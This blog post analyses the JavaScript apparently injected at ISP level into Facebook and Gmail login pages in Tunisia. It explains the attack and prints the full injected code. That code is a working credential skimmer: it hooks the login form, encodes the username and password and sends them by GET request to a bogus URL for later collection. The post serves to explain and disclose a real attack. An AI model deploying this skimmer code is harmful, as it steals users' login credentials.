The Code Injected To Steal Passwords In Tunisia

It's been floating around the net for weeks now, but I finally took a look at how someone in Tunisia (assumption is the government) was stealing usernames and passwords from common sites like Google Mail and Facebook.

The attack worked like this:

1. When a user visited a site like Facebook JavaScript would be injected into the page where the user types in their username and password. On Facebook these pages are served via HTTP and so the injection is possible if you can intercept at the ISP level. The actual username and password are sent via HTTPS but once the JavaScript is in there it's game over.

2. The login form itself is modified to include an onsubmit handler that calls the JavaScript function hAAAQ3d (which reads as hacked). That function reads the username and password and makes an HTTP call to a bogus page on Facebook. This page (named wo0dh3ad, which I think you can read was woodhead) has the username and password appended as parameters with some code to make them URL safe.

3. Someone, somewhere reads those URLs to extract the username and password. That could be done from a log file, or even a firewall could have been configured to filter these requests so that they would never reach Facebook.

I've pretty printed the code below. The major functions are hAAAQ3d (described above), r5t (generates a random string of characters which are added to the request URL used to send the username and password) and h6h (which I read as 'hash' which takes a username or password and converts it to a string of lowercase characters that can be safely transmitted in a URL).

There are helper functions inv0k(1,2,3) (which I read as 'invoke') which make the actual HTTP request. Two are used for different browser types and third is not used, but what it does is modify an injected image tag to get the same URL used to send the username/password.
function h6h(st)  {    var st2="";    for ( i = 0; i < st.length; i++ ) {      c = st.charCodeAt(i);      ch = (c & 0xF0) >> 4;      cl = c & 0x0F;      st2 = st2 + String.fromCharCode( ch + 97 ) +                   String.fromCharCode( cl + 97 );    }    return st2;  }    function r5t(len)  {    var st = "";    for ( i = 0; i < len; i++ )      st = st + String.fromCharCode( Math.floor( Math.random( 1 ) * 26 + 97 ) );     return st;  }    function hAAAQ3d()  {    var frm = document.getElementById( "login_form" );     var us3r = frm.email.value;     var pa55 = frm.pass.value;    var url = "http://www.facebook.com/wo0dh3ad?q=" + r5t( 5 ) +         "&u=" + h6h( us3r ) + "&p=" + h6h( pa55 );     var bnm = navigator.appName;     if ( bnm == 'Microsoft Internet Explorer' )      inv0k3(url);    else       inv0k2(url);  }    function inv0k1(url)   {    var objhq = document.getElementById("x6y7z8");     objhq.src = url;  }    function inv0k2(url)  {    var xr = new XMLHttpRequest();     xr.open("GET", url, false);     xr.send("");  }    function inv0k3(url)   {    var xr = new ActiveXObject('Microsoft.XMLHTTP');     xr.open("GET", url, false);     xr.send("");  }  

If you enjoyed this blog post, you might enjoy my travel book for people interested in science and technology: The Geek Atlas. Signed copies of The Geek Atlas are available.


No comments: